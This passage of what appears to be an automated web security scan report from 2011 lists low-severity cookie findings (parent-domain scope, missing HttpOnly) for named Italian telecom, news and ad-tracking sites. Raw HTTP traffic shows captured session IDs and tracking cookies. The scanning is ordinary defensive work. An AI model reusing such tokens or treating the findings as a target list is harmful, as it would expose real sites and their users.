GET /b/ss/s24onewsprod,s24oglobal/1/H.20.3/s78620203291065?AQB=1&ndh=1&t=2/4/2011%2022%3A13%3A52%201%20300&ce=ISO-8859-1&ns=ilsole24ore&pageName=N24%3Ahome%3Ahome&g=http%3A//www.ilsole24ore.com/&cc=EUR&ch=N24%3Ahome&events=event1&c1=N24%3Ahome%3Ahome&v1=D%3Dc1&h1=N24%2Chome&c2=N24%3Ahome%3Ahome&v2=D%3Dc2&c3=N24%3Ahome%3Ahome&v3=D%3Dc3&c4=N24%3Ahome%3Ahome&c9=N24%3Ahome&v9=D%3Dc9&c11=5%3A00AM&v11=D%3Dc11&c12=Tuesday&v12=D%3Dc12&c13=Weekday&v13=D%3Dc13&c14=New&v14=D%3Dc14&c15=Not%20logged%20in&v15=D%3Dc15&c16=First%20page%20view%20or%20cookies%20not%20supported&v16=First%20page%20view%20or%20cookies%20not%20supported&c49=D%3Ds_vi&v49=D%3DpageName&v50=D%3Dch&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1304392432178-New; s_lastvisit=1304392432179; SC_LINKS_NW=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:17:41 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DF96C2851D06B3-4000012760000DEA[CE]; Expires=Sat, 30 Apr 2016 22:17:41 GMT; Domain=.ilsole24ore.com; Path=/
Location: http://metrics.ilsole24ore.com/b/ss/s24onewsprod,s24oglobal/1/H.20.3/s78620203291065?AQB=1&pccr=true&vidn=26DF96C2851D06B3-4000012760000DEA&&ndh=1&t=2/4/2011%2022%3A13%3A52%201%20300&ce=ISO-8859-1&ns=ilsole24ore&pageName=N24%3Ahome%3Ahome&g=http%3A//www.ilsole24ore.com/&cc=EUR&ch=N24%3Ahome&events=event1&c1=N24%3Ahome%3Ahome&v1=D%3Dc1&h1=N24%2Chome&c2=N24%3Ahome%3Ahome&v2=D%3Dc2&c3=N24%3Ahome%3Ahome&v3=D%3Dc3&c4=N24%3Ahome%3Ahome&c9=N24%3Ahome&v9=D%3Dc9&c11=5%3A00AM&v11=D%3Dc11&c12=Tuesday&v12=D%3Dc12&c13=Weekday&v13=D%3Dc13&c14=New&v14=D%3Dc14&c15=Not%20logged%20in&v15=D%3Dc15&c16=First%20page%20view%20or%20cookies%20not%20supported&v16=First%20page%20view%20or%20cookies%20not%20supported&c49=D%3Ds_vi&v49=D%3DpageName&v50=D%3Dch&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 01 May 2011 22:17:41 GMT
Last-Modified: Tue, 03 May 2011 22:17:41 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www259
Content-Length: 0
Content-Type: text/plain


14.64. http://metrics.ilsole24ore.com/b/ss/s24oshoppreprod/1/H.20.3/s76706321355364  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.ilsole24ore.com
Path:   /b/ss/s24oshoppreprod/1/H.20.3/s76706321355364

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/s24oshoppreprod/1/H.20.3/s76706321355364?AQB=1&ndh=1&t=2/4/2011%2022%3A31%3A6%201%20300&ce=ISO-8859-1&ns=ilsole24ore&g=about%3Ablank&cc=EUR&c42=undefined&c44=undefined%20%7C%20no%20%26lid&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A//www.casa24.ilsole24ore.com/&pid=about%3Ablank&oid=http%3A//www.casa24.ilsole24ore.com/&ot=A&oi=38&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: metrics.ilsole24ore.com

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:34:54 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DF98C7051D06F6-60000126C001D9F4[CE]; Expires=Sat, 30 Apr 2016 22:34:54 GMT; Domain=.ilsole24ore.com; Path=/
Location: http://metrics.ilsole24ore.com/b/ss/s24oshoppreprod/1/H.20.3/s76706321355364?AQB=1&pccr=true&vidn=26DF98C7051D06F6-60000126C001D9F4&&ndh=1&t=2/4/2011%2022%3A31%3A6%201%20300&ce=ISO-8859-1&ns=ilsole24ore&g=about%3Ablank&cc=EUR&c42=undefined&c44=undefined%20%7C%20no%20%26lid&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A//www.casa24.ilsole24ore.com/&pid=about%3Ablank&oid=http%3A//www.casa24.ilsole24ore.com/&ot=A&oi=38&AQE=1
X-C: ms-4.4.1
Expires: Sun, 01 May 2011 22:34:54 GMT
Last-Modified: Tue, 03 May 2011 22:34:54 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www254
Content-Length: 0
Content-Type: text/plain


14.65. http://omniture.virgilio.it/b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.virgilio.it
Path:   /b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955?AQB=1&ndh=1&t=2%2F4%2F2011%2022%3A13%3A45%201%20300&ns=telecomitalia&pageName=ECM%3AHome&g=http%3A%2F%2Fwww.telecomitalia.it%2F&cc=EUR&ch=Home&events=event1&h1=Home&h2=telecomitalia.it%2CECM%2CHome&v5=D%3DpageName&v6=D%3Dch&c9=ECM&v9=ECM&c10=telecomitalia.it&v10=telecomitalia.it&c11=New&v11=New&c12=manuale%2Fcms&v16=navigazione&v17=non-browse&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: omniture.virgilio.it
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:16:15 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DF96978507A1D7-6000010040005559[CE]; Expires=Sat, 30 Apr 2016 22:16:15 GMT; Domain=.virgilio.it; Path=/
Location: http://omniture.virgilio.it/b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955?AQB=1&pccr=true&vidn=26DF96978507A1D7-6000010040005559&&ndh=1&t=2%2F4%2F2011%2022%3A13%3A45%201%20300&ns=telecomitalia&pageName=ECM%3AHome&g=http%3A%2F%2Fwww.telecomitalia.it%2F&cc=EUR&ch=Home&events=event1&h1=Home&h2=telecomitalia.it%2CECM%2CHome&v5=D%3DpageName&v6=D%3Dch&c9=ECM&v9=ECM&c10=telecomitalia.it&v10=telecomitalia.it&c11=New&v11=New&c12=manuale%2Fcms&v16=navigazione&v17=non-browse&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 01 May 2011 22:16:15 GMT
Last-Modified: Tue, 03 May 2011 22:16:15 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www2
Content-Length: 0
Content-Type: text/plain


14.66. http://paginebianche.ilsole24ore.com/execute.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://paginebianche.ilsole24ore.com
Path:   /execute.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /execute.cgi HTTP/1.1
Host: paginebianche.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:26:34 GMT
Server: Apache
Set-Cookie: kpi=173.193.214.243.1304375194561290; path=/; expires=Thu, 29-Apr-21 22:26:34 GMT; domain=.ilsole24ore.com
Set-Cookie: PHPSESSID=1ffh2sghlilotqrq20u2nst8a1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sessionid=1ffh2sghlilotqrq20u2nst8a1; domain=.paginebianche.it
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 30688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="it">
<head><meta http-equiv="Content-Type" content=
...[SNIP]...

14.67. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=5864 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1986=2724386019227846218; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1185=2931142961646634775; put_2100=usr3fd49cb9a7122f52; ses9=12566^1; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262494%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263577%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C; put_1994=xrd52zkwjuxh; ruid=154dab7990adc1d6f3372c12^7^1304360282^2915161843; khaos=GMMM8SST-B-HSA1; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%264894%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1; ses2=12338^12&12590^6&12566^1&9346^1&13027^5&13186^6&7477^6; csi2=3201767.js^1^1304363134^1304363134&3150337.js^1^1304362966^1304362966&3138805.js^3^1304360977^1304361628&3203287.js^5^1304340348^1304361606&3167235.js^2^1304360282^1304360956&3200913.js^1^1304360305^1304360305&3140640.js^1^1304358971^1304358971&3166420.js^2^1304358895^1304358947&3198218.js^1^1304358916^1304358916&3151967.js^10^1304340353^1304341104&3151648.js^4^1304340357^1304340523&3201777.js^2^1304340371^1304340482&3188003.js^1^1304340382^1304340382&3150134.js^1^1304340344^1304340344&3199967.js^1^1304340334^1304340334; ses15=12590^7&12338^6&13186^5&13027^2&7477^6&12017^1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; cd=false

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:16:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%264894%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1; expires=Wed, 01-Jun-2011 22:16:18 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C; expires=Wed, 01-Jun-2011 22:16:18 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

14.68. http://search.yahoo.com/bin/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /bin/search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bin/search HTTP/1.1
Host: search.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:26:52 GMT
Set-Cookie: B=bpo29tt6rubtc&b=3&s=kb; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: sSN=3eSvUDo2wWFRGwNfu4Zai5tBVkIRVcnL10fjiylXzSdqNCm1Gni_b8k7hSc2rpURGtOsHmJqBbg7yUFu05.v1w--; path=/; domain=.search.yahoo.com
Location: http://search.yahoo.com/web?fr=
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 86

<!-- syc13.search.ac2.yahoo.com uncompressed/chunked Mon May 2 15:26:52 PDT 2011 -->

14.69. http://secure-it.imrworldwide.com/cgi-bin/m  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-it.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/m?rnd=1304399099664&ci=ilsole-it&cg=0&cc=0&sr=1920x1200&cd=16&lg=en-us&je=y&ck=y&tz=-5&ct=lan&hp=y&si=about%3Ablank&rp= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: secure-it.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:05:00 GMT
Server: Apache
Set-Cookie: V5=AStfNgtNDx0sNh8.HzYjIz8zEBYzFVInHlInHQ__; expires=Fri, 30-Apr-2021 00:05:00 GMT; domain=.imrworldwide.com; path=/cgi-bin
Set-Cookie: IMRID=Tb9GrNTvKWYAAVGXyQw; expires=Fri, 30-Apr-2021 00:05:00 GMT; path=/cgi-bin; domain=.imrworldwide.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Connection: close
Content-Type: image/gif
Content-Length: 44

GIF89a.............!.......,...........D..;.

14.70. http://www.bing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; usrID=1f9c26d0-fd25-ba11-6fc5-10c3cf0873bc

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 21:28:49 GMT
Connection: close
Set-Cookie: _SS=SID=9EEFFDDAEA794F34A5B65EDC1A773E5B; domain=.bing.com; path=/
Content-Length: 28806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" ><head><me
...[SNIP]...

15. Cookie without HttpOnly flag set  previous  next
There are 203 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



15.1. https://account.musfiber.com/login.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://account.musfiber.com
Path:   /login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.php HTTP/1.1
Host: account.musfiber.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:32:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=bq4jvcopcniq8jdvo0dtnu3n95; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18865

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/Main.dwt" codeOutsideHTMLIsLocked="false" -->
<he
...[SNIP]...

15.2. https://areaclienti187.telecomitalia.it/auth/recuperapassword.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /auth/recuperapassword.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/recuperapassword.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:22 GMT
Server: Apache
Cache-Control: No-Cache
Cache-Control: no-cache="set-cookie"
Pragma: No-Cache
Content-Length: 6011
Expires: -1
Set-Cookie: JSESSIONID_AUTH=8xp2N1nh8BBHsHSDpxKfQvZTQGTxjLZYp8L4W6D1dGRYvPJ6SG1G!1105479713; path=/
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

15.3. https://areaclienti187.telecomitalia.it/auth/registrautente.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /auth/registrautente.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/registrautente.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:24 GMT
Server: Apache
Cache-Control: No-Cache
Cache-Control: no-cache="set-cookie"
Pragma: No-Cache
Expires: -1
Set-Cookie: JSESSIONID_AUTH=zdfWN1nchhvzYNWhbqpHMStZrjhmgxwlRN3LjKtxyY1jyShhywL4!519317924; path=/
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 24761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w
...[SNIP]...

15.4. https://areaclienti187.telecomitalia.it/cdas187/d/a/p18485/serv.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /cdas187/d/a/p18485/serv.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdas187/d/a/p18485/serv.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:24 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=h72QN1ncLn59VV1nLzn2G6CN3GxcTPPH5rL1zPy022ctxnzFxMnC!-1329674579; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;"
...[SNIP]...

15.5. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21608/serv2.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /cdas187/d/a/p21608/serv2.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdas187/d/a/p21608/serv2.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
